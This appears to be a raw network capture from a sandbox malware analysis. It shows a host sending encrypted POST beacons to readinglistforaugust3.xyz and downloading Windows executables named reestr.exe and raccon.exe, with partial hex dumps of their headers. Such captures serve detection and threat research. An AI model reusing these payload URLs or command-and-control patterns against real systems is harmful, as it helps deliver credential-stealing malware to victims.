Aug 24, 2021 08:46:43.032092094 CEST	6204	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://readinglistforaugust3.xyz/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 157 Host: readinglistforaugust3.xyz
Aug 24, 2021 08:46:43.033498049 CEST	6205	OUT	Data Raw: 6c 9b 06 9e 13 ec 9a 09 ce 7a 79 63 e7 e7 5a 19 62 bf a3 46 7d c4 1a de 65 ce 48 18 52 d2 da 52 21 7f 23 0c 24 b7 6e 82 07 3c 89 8e 2b b7 9f ad 6e 2f 5a 6f ce 5d de 66 cc 82 a7 61 34 21 6a 3a a3 e8 51 b5 86 1c 21 bc d5 4a 99 47 ba bf 8b f4 c5 26 Data Ascii: lzycZbF}eHRR!#$n<+n/Zo]fa4!j:Q!JG&wQC`Ew,f){ASLAi/;Xkbu`S4d
Aug 24, 2021 08:46:43.102996111 CEST	6206	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 24 Aug 2021 06:46:43 GMT Content-Type: text/html; charset=utf-8 Content-Length: 55 Connection: keep-alive Keep-Alive: timeout=3 Vary: Accept-Encoding Data Raw: 00 00 a7 a2 7f d5 7f 6b 10 19 36 87 8f bf a7 46 90 6c 01 06 a1 6d 47 49 35 93 59 0b a5 f2 c1 9d 60 dd dc bd 17 c5 d4 e5 a0 52 7a bb d1 87 1d e5 31 7d 50 0d 1f 53 3f Data Ascii: k6FlmGI5Y`Rz1}PS?
Aug 24, 2021 08:46:43.113642931 CEST	6206	OUT	GET /reestr.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: readinglistforaugust3.xyz
Aug 24, 2021 08:46:43.175381899 CEST	6207	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 24 Aug 2021 06:46:43 GMT Content-Type: application/x-msdos-program Content-Length: 24576 Connection: keep-alive Keep-Alive: timeout=3 Last-Modified: Tue, 17 Aug 2021 14:34:32 GMT ETag: "6000-5c9c2374e92ba" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 4b c4 db 9d 2a aa 88 9d 2a aa 88 9d 2a aa 88 1e 36 a4 88 9c 2a aa 88 f4 35 a3 88 9f 2a aa 88 74 35 a7 88 9c 2a aa 88 52 69 63 68 9d 2a aa 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 ee fd 3a 5d 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 30 00 00 00 20 00 00 00 00 00 00 78 12 00 00 00 10 00 00 00 40 00 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 16 00 0b 00 04 00 00 00 00 00 00 00 00 60 00 00 00 10 00 00 83 62 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 54 2e 00 00 28 00 00 00 00 50 00 00 7c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 02 00 00 20 00 00 00 00 10 00 00 d4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 50 22 00 00 00 10 00 00 00 30 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 84 03 00 00 00 40 00 00 00 10 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 7c 0a 00 00 00 50 00 00 00 10 00 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 c3 1f b0 49 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$K**65t5Rich*PEL:]0 x@@`bT.(P\|0 .textP"0 `.data@@@.rsrc\|PP@@IMSVBVM60.DLL
Aug 24, 2021 08:46:44.212531090 CEST	6239	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://readinglistforaugust3.xyz/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 209 Host: readinglistforaugust3.xyz
Aug 24, 2021 08:46:44.212690115 CEST	6239	OUT	Data Raw: 6c 9b 06 9e 13 ec 9a 09 ce 7a 79 63 e7 e7 5a 19 62 bf a3 46 7d c4 1a de 65 ce 48 18 52 d2 da 52 21 7f 23 0c 24 b7 6e 82 07 3c 89 8e 2b b7 9f ad 6e 2f 5a 6f ce 5d de 66 cc 82 a7 61 34 21 6a 3a a3 e8 51 b5 87 1c 21 bc d5 4a 98 47 ba bf 87 d9 f8 4b Data Ascii: lzycZbF}eHRR!#$n<+n/Zo]fa4!j:Q!JGK%L##-*2(A,]FEr lI~#k]W{=_J-_9]zh%2B17j
Aug 24, 2021 08:46:44.262101889 CEST	6240	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 24 Aug 2021 06:46:44 GMT Content-Type: text/html; charset=utf-8 Content-Length: 413 Connection: keep-alive Keep-Alive: timeout=3 Vary: Accept-Encoding Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 30 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 72 65 61 64 69 6e 67 6c 69 73 74 66 6f 72 61 75 67 75 73 74 33 2e 78 79 7a 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.10 (Debian) Server at readinglistforaugust3.xyz Port 80</address></body></html>
Aug 24, 2021 08:46:44.335681915 CEST	6241	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://readinglistforaugust3.xyz/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 165 Host: readinglistforaugust3.xyz
Aug 24, 2021 08:46:44.335717916 CEST	6242	OUT	Data Raw: 6c 9b 06 9e 13 ec 9a 09 ce 7a 79 63 e7 e7 5a 19 62 bf a3 46 7d c4 1a de 65 ce 48 18 52 d2 da 52 21 7f 23 0c 24 b7 6e 82 07 3c 89 8e 2b b7 9f ad 6e 2f 5a 6f ce 5d de 66 cc 82 a7 61 34 21 6a 3a a3 e8 51 b5 86 1c 20 bc d5 4a 99 47 ba bf ac 82 95 4c Data Ascii: lzycZbF}eHRR!#$n<+n/Zo]fa4!j:Q JGLkX2<)[m{=B,J6KCfH9O"O@)ZiNzant
Aug 24, 2021 08:46:44.386739016 CEST	6243	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 24 Aug 2021 06:46:44 GMT Content-Type: text/html; charset=utf-8 Content-Length: 413 Connection: keep-alive Keep-Alive: timeout=3 Vary: Accept-Encoding Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 30 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 72 65 61 64 69 6e 67 6c 69 73 74 66 6f 72 61 75 67 75 73 74 33 2e 78 79 7a 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.10 (Debian) Server at readinglistforaugust3.xyz Port 80</address></body></html>
Aug 24, 2021 08:46:44.397047043 CEST	6243	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://readinglistforaugust3.xyz/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 137 Host: readinglistforaugust3.xyz
Aug 24, 2021 08:46:44.397125006 CEST	6244	OUT	Data Raw: 6c 9b 06 9e 13 ec 9a 09 ce 7a 79 63 e7 e7 5a 19 62 bf a3 46 7d c4 1a de 65 ce 48 18 52 d2 da 52 21 7f 23 0c 24 b7 6e 82 07 3c 89 8e 2b b7 9f ad 6e 2f 5a 6f ce 5d de 66 cc 82 a7 61 34 21 6a 3a a3 e8 51 b5 86 1c 23 bc d5 4a 99 47 ba bf a5 df cc 5a Data Ascii: lzycZbF}eHRR!#$n<+n/Zo]fa4!j:Q#JGZP#V<+\|/YQ:<oe}OkA_N
Aug 24, 2021 08:46:44.445841074 CEST	6244	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 24 Aug 2021 06:46:44 GMT Content-Type: text/html; charset=utf-8 Content-Length: 55 Connection: keep-alive Keep-Alive: timeout=3 Vary: Accept-Encoding Data Raw: 00 00 a7 a2 7f d5 7f 6b 10 19 36 87 8f bf a7 46 90 6c 01 06 a1 6d 47 49 35 93 59 0b a5 f2 c1 9d 60 dd dc bd 17 c5 d4 e5 a0 52 7a bb d1 87 19 e3 21 66 4c 0d 1f 53 3f Data Ascii: k6FlmGI5Y`Rz!fLS?
Aug 24, 2021 08:46:44.694051981 CEST	6245	OUT	GET /raccon.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: readinglistforaugust3.xyz
Aug 24, 2021 08:46:44.695614100 CEST	6246	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 24 Aug 2021 06:46:44 GMT Content-Type: text/html; charset=utf-8 Content-Length: 55 Connection: keep-alive Keep-Alive: timeout=3 Vary: Accept-Encoding Data Raw: 00 00 a7 a2 7f d5 7f 6b 10 19 36 87 8f bf a7 46 90 6c 01 06 a1 6d 47 49 35 93 59 0b a5 f2 c1 9d 60 dd dc bd 17 c5 d4 e5 a0 52 7a bb d1 87 19 e3 21 66 4c 0d 1f 53 3f Data Ascii: k6FlmGI5Y`Rz!fLS?
Aug 24, 2021 08:46:44.772610903 CEST	6247	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 24 Aug 2021 06:46:44 GMT Content-Type: application/x-msdos-program Content-Length: 439296 Connection: keep-alive Keep-Alive: timeout=3 Last-Modified: Tue, 24 Aug 2021 06:46:01 GMT ETag: "6b400-5ca487caad1df" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 ce 1e c0 5f 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 6e 05 00 00 7a 8a 02 00 00 00 00 1e 24 00 00 00 10 00 00 00 80 05 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 a0 8f 02 00 04 00 00 05 e4 06 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 30 c0 05 00 51 00 00 00 f0 b5 05 00 3c 00 00 00 00 d0 8e 02 98 c5 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 81 05 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 9d 05 00 18 00 00 00 d8 9c 05 00 40 00 00 00 00 00 00 00 00 00 00 00 00 80 05 00 b0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 81 6c 05 00 00 10 00 00 00 6e 05 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 81 40 00 00 00 80 05 00 00 42 00 00 00 72 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 38 f2 88 02 00 d0 05 00 00 3a 00 00 00 b4 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 98 c5 00 00 00 d0 8e 02 00 c6 00 00 00 ee 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c7 01 20 82 45 00 e9 b6 0f 00 00 56 8b f1 c7 06 20 82 45 00 e8 a8 0f 00 00 f6 44 24 08 01 74 07 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL_nz$@0Q< @.textln `.rdata@Br@@.data8:@.rsrc@@ EV ED$t
Aug 24, 2021 08:46:47.409662008 CEST	6699	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://readinglistforaugust3.xyz/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 342 Host: readinglistforaugust3.xyz
Aug 24, 2021 08:46:47.409729004 CEST	6700	OUT	Data Raw: 6c 9b 06 9e 13 ec 9a 09 ce 7a 79 63 e7 e7 5a 19 62 bf a3 46 7d c4 1a de 65 ce 48 18 52 d2 da 52 21 7f 23 0c 24 b7 6e 82 07 3c 89 8e 2b b7 9f ad 6e 2f 5a 6f ce 5d de 66 cc 82 a7 61 34 21 6a 3a a3 e8 51 b5 87 1c 23 bc d5 4a 98 47 ba bf de 83 8b 36 Data Ascii: lzycZbF}eHRR!#$n<+n/Zo]fa4!j:Q#JG6a?K\|MF#y`2W@TE5M:hyErw+fR\|moiA}Sf0'R-Q7LMmXM'36Jb3LYxb
Aug 24, 2021 08:46:47.459944010 CEST	6700	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 24 Aug 2021 06:46:47 GMT Content-Type: text/html; charset=utf-8 Content-Length: 413 Connection: keep-alive Keep-Alive: timeout=3 Vary: Accept-Encoding Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 30 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 72 65 61 64 69 6e 67 6c 69 73 74 66 6f 72 61 75 67 75 73 74 33 2e 78 79 7a 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.10 (Debian) Server at readinglistforaugust3.xyz Port 80</address></body></html>
Aug 24, 2021 08:46:47.487756014 CEST	6701	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://readinglistforaugust3.xyz/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 310 Host: readinglistforaugust3.xyz
Aug 24, 2021 08:46:47.487801075 CEST	6701	OUT	Data Raw: 6c 9b 06 9e 13 ec 9a 09 ce 7a 79 63 e7 e7 5a 19 62 bf a3 46 7d c4 1a de 65 ce 48 18 52 d2 da 52 21 7f 23 0c 24 b7 6e 82 07 3c 89 8e 2b b7 9f ad 6e 2f 5a 6f ce 5d de 66 cc 82 a7 61 34 21 6a 3a a3 e8 51 b5 86 1c 22 bc d5 4a 99 47 ba bf c0 fc 80 76 Data Ascii: lzycZbF}eHRR!#$n<+n/Zo]fa4!j:Q"JGvT+'+ :.1`VCCjqIKm`x!.H-g*O<k!.XT+7](JyYHTVJiX1
Aug 24, 2021 08:46:47.533476114 CEST	6702	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 24 Aug 2021 06:46:47 GMT Content-Type: text/html; charset=utf-8 Content-Length: 413 Connection: keep-alive Keep-Alive: timeout=3 Vary: Accept-Encoding Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 30 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 72 65 61 64 69 6e 67 6c 69 73 74 66 6f 72 61 75 67 75 73 74 33 2e 78 79 7a 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.10 (Debian) Server at readinglistforaugust3.xyz Port 80</address></body></html>
Aug 24, 2021 08:46:47.660657883 CEST	6702	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://readinglistforaugust3.xyz/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 284 Host: readinglistforaugust3.xyz
Aug 24, 2021 08:46:47.660703897 CEST	6702	OUT	Data Raw: 6c 9b 06 9e 13 ec 9a 09 ce 7a 79 63 e7 e7 5a 19 62 bf a3 46 7d c4 1a de 65 ce 48 18 52 d2 da 52 21 7f 23 0c 24 b7 6e 82 07 3c 89 8e 2b b7 9f ad 6e 2f 5a 6f ce 5d de 66 cc 82 a7 61 34 21 6a 3a a3 e8 51 b5 86 1c 25 bc d5 4a 99 47 ba bf c5 e4 ce 76 Data Ascii: lzycZbF}eHRR!#$n<+n/Zo]fa4!j:Q%JGvo)8d-M=6!:C.])f[@Tylsb2eTO]]%'3y94.e.w\|T"dY78*SO^RGo?
